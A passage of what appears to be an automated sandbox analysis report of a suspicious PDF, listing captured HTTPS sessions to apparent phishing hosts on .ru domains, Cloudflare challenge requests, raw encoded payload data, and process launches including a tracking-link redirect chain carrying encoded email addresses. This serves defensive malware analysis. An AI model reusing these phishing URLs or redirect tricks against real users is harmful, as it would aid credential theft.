                                                                                                    2025-01-14 17:38:14 UTC1369INData Raw: 6c 33 6f 58 72 43 6a 71 53 53 68 36 4b 6c 6c 34 71 4c 71 49 33 4e 6e 64 4c 45 69 34 61 67 31 72 6a 59 74 4e 6a 57 70 4a 33 48 32 4b 2f 64 32 70 6d 31 31 73 66 51 33 4e 36 33 34 73 72 4b 76 4e 72 4c 30 4d 44 75 33 72 2f 41 77 2b 4c 6c 73 38 72 33 38 2b 7a 4b 33 75 6d 36 30 67 4c 75 7a 37 38 46 32 73 44 57 7a 4e 6a 73 78 76 44 63 79 77 62 73 36 50 44 50 46 4f 76 54 37 2f 41 47 39 78 37 30 36 2f 76 37 45 50 6a 2b 34 53 62 36 2b 42 59 58 44 2f 59 41 44 76 77 77 4a 69 44 30 2f 68 51 47 49 79 38 75 4f 66 73 2f 4d 7a 73 43 44 66 74 42 46 77 41 63 47 52 74 4a 49 77 6b 66 4a 30 34 37 48 6b 4d 4c 4a 69 4d 4e 4f 45 77 69 57 55 30 61 4b 6b 31 4f 58 55 74 54 57 53 55 34 5a 6a 73 69 55 30 4d 72 52 6a 6f 6c 51 44 34 78 59 47 4e 4e 52 6e 64 6d 52 6c 74 53 62 54 78 51 58
                                                                                                    Data Ascii: l3oXrCjqSSh6Kll4qLqI3NndLEi4ag1rjYtNjWpJ3H2K/d2pm11sfQ3N634srKvNrL0MDu3r/Aw+Lls8r38+zK3um60gLuz78F2sDWzNjsxvDcywbs6PDPFOvT7/AG9x706/v7EPj+4Sb6+BYXD/YADvwwJiD0/hQGIy8uOfs/MzsCDftBFwAcGRtJIwkfJ047HkMLJiMNOEwiWU0aKk1OXUtTWSU4ZjsiU0MrRjolQD4xYGNNRndmRltSbTxQX
                                                                                                    2025-01-14 17:38:14 UTC537INData Raw: 36 78 73 43 63 6f 6f 4b 30 72 59 53 6e 6e 4b 4b 71 71 38 57 2b 6e 71 76 52 6f 37 50 5a 71 36 36 33 31 62 4f 71 34 4e 62 63 73 64 58 48 34 4c 50 71 78 70 36 2b 78 62 76 51 73 64 2f 69 35 73 43 76 38 76 48 47 39 2f 72 74 7a 4e 66 78 36 75 45 42 2f 64 48 53 34 41 62 2b 31 2f 66 35 33 39 37 6f 7a 51 37 35 45 75 6f 56 35 2b 34 53 39 65 51 49 35 2f 76 6f 44 51 33 53 36 75 73 53 48 51 4c 2b 2b 79 48 32 48 2b 49 6f 44 2f 77 4c 4d 67 4d 4c 43 43 63 41 44 6a 48 7a 2b 44 6f 79 46 50 4d 63 43 44 6b 4e 4d 45 4d 65 4c 79 55 79 4b 44 49 5a 4f 69 30 64 4c 53 51 79 49 44 45 6f 51 44 35 47 56 30 70 43 4a 45 59 38 4c 44 30 63 57 55 74 53 56 6b 59 31 4e 53 4e 54 55 6c 38 6b 59 6c 63 34 62 6c 46 62 54 47 64 76 56 7a 42 52 63 6d 4e 55 65 6c 31 65 4f 44 64 68 55 56 46 32 5a 57
                                                                                                    Data Ascii: 6xsCcooK0rYSnnKKqq8W+nqvRo7PZq6631bOq4NbcsdXH4LPqxp6+xbvQsd/i5sCv8vHG9/rtzNfx6uEB/dHS4Ab+1/f5397ozQ75EuoV5+4S9eQI5/voDQ3S6usSHQL++yH2H+IoD/wLMgMLCCcADjHz+DoyFPMcCDkNMEMeLyUyKDIZOi0dLSQyIDEoQD5GV0pCJEY8LD0cWUtSVkY1NSNTUl8kYlc4blFbTGdvVzBRcmNUel1eODdhUVF2ZW


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    38192.168.2.563878104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:14 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:14 UTC442INHTTP/1.1 400 Bad Request
                                                                                                    Date: Tue, 14 Jan 2025 17:38:14 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 14
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    cf-chl-out: Jn6fEt+/4qWltYj+7HafgbdVND3KWtzWOO0Xn60oSo5IKhzACAkfPZRh0bsxwxY2OiVQWlP0Ag9TtMbmZhXmXQ==$hAXe6L4WOPndxNeVPbnELA==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f660a0eab43bc-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:14 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                    Data Ascii: {"err":100230}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    39192.168.2.563879104.21.60.1114437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:14 UTC653OUTGET /XguRQyGirCoCfFLdTCFAUEEHJYDVUYACVLBCQIPCIRGZZIVMBLDKKAZHAC HTTP/1.1
                                                                                                    Host: wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://l4u8.yaalwgyl.ru
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://l4u8.yaalwgyl.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:15 UTC906INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Scdxh8e63VyCwewv%2F9NCP%2FMpeELvrazW%2FQf%2F0nPs1lwNm9t1xOp3dKw6%2F6JPGDogxvzi0jF%2ByfJ5k3KbR5AfLZAEggoRQ7Bq0l9N%2Bk6s8WK7WPkL0ideijziC%2BEMSKGxvrFxOb3E%2Fox%2BjSmx3QCnl3Zoapi3lHa6cH65VfqVrxGSwdPh%2BX5oeg1NAmyrEQgbRxXaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f660b583f4309-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1597&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1231&delivery_rate=1754807&cwnd=234&unsent_bytes=0&cid=325d1fc804b73680&ts=621&x=0"
                                                                                                    2025-01-14 17:38:15 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                    Data Ascii: 11
                                                                                                    2025-01-14 17:38:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    40192.168.2.563883104.21.60.1114437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:16 UTC447OUTGET /XguRQyGirCoCfFLdTCFAUEEHJYDVUYACVLBCQIPCIRGZZIVMBLDKKAZHAC HTTP/1.1
                                                                                                    Host: wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:17 UTC886INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlZQJzXv9K7MFx6MWg%2BBYRbPII7KIjn2WLCTKTK6bb0bQhRdYiz3fzDSWdorgTBn0SVbvFojRKnVAUb9qUhgzF5BbPhPaarHJWunkmKcbc9GGwVIZK0hyyU1TPmWhuSpfS9VSq5NYC62Pz4DUmzZBvuxXd7Xt6PMEseK1mafp1UAZdq4qcG7sdBlDihBcM5tJx0MbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f66164adf42b1-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1592&rtt_var=619&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1025&delivery_rate=1834170&cwnd=211&unsent_bytes=0&cid=53e7de8ccb1f4300&ts=632&x=0"
                                                                                                    2025-01-14 17:38:17 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                    Data Ascii: 11
                                                                                                    2025-01-14 17:38:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:12:35:19
                                                                                                    Start date:14/01/2025
                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Document_31055.pdf"
                                                                                                    Imagebase:0x7ff686a00000
                                                                                                    File size:5'641'176 bytes
                                                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:12:35:20
                                                                                                    Start date:14/01/2025
                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                    Imagebase:0x7ff6413e0000
                                                                                                    File size:3'581'912 bytes
                                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:12:35:21
                                                                                                    Start date:14/01/2025
                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1588,i,14734467309998307436,13739961970335841568,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                    Imagebase:0x7ff6413e0000
                                                                                                    File size:3'581'912 bytes
                                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:12:35:45
                                                                                                    Start date:14/01/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://api.mixpanel.com/track/?data=eyJldmVudCI6ImUtbWFpbDogW0FjdGlvbiBSZXF1aXJlZF0gUmVjb25uZWN0IEFkV29yZHMsIEZhY2Vib29rIHRvIFJvY2tlcmJveCAtIChjbGljaykiLCJwcm9wZXJ0aWVzIjp7InRva2VuIjoiYTQ4MzY4OTA0MTgzY2Y0MDVkZWI5MDg4MWUxNTRiZDgiLCJkaXN0aW5jdF9pZCI6ImxwcmlzZW5kb3JmQGphbmVpcmVkYWxlLmNvbSIsImxpbmsiOiJodHRwczpcL1wvYXBwLnJvY2tlcmJveC5jb20iLCJjYW1wYWlnbiI6InRyYW5zYWN0aW9uYWwifX0=&redirect=https%3A%2F%2Fmidiacentral.com.br%2Foslksedhlabd%2Fgyu%2Fwio%2Fblip%2Fsepla%2FGina/bWR1bm5AZ2VvaW5zaWdodHMuY29t"
                                                                                                    Imagebase:0x7ff715980000
                                                                                                    File size:3'242'272 bytes
                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:9
                                                                                                    Start time:12:35:46
                                                                                                    Start date:14/01/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2384,i,12472687294183246176,5245290317952259585,262144 /prefetch:8
                                                                                                    Imagebase:0x7ff715980000
                                                                                                    File size:3'242'272 bytes
                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    No disassembly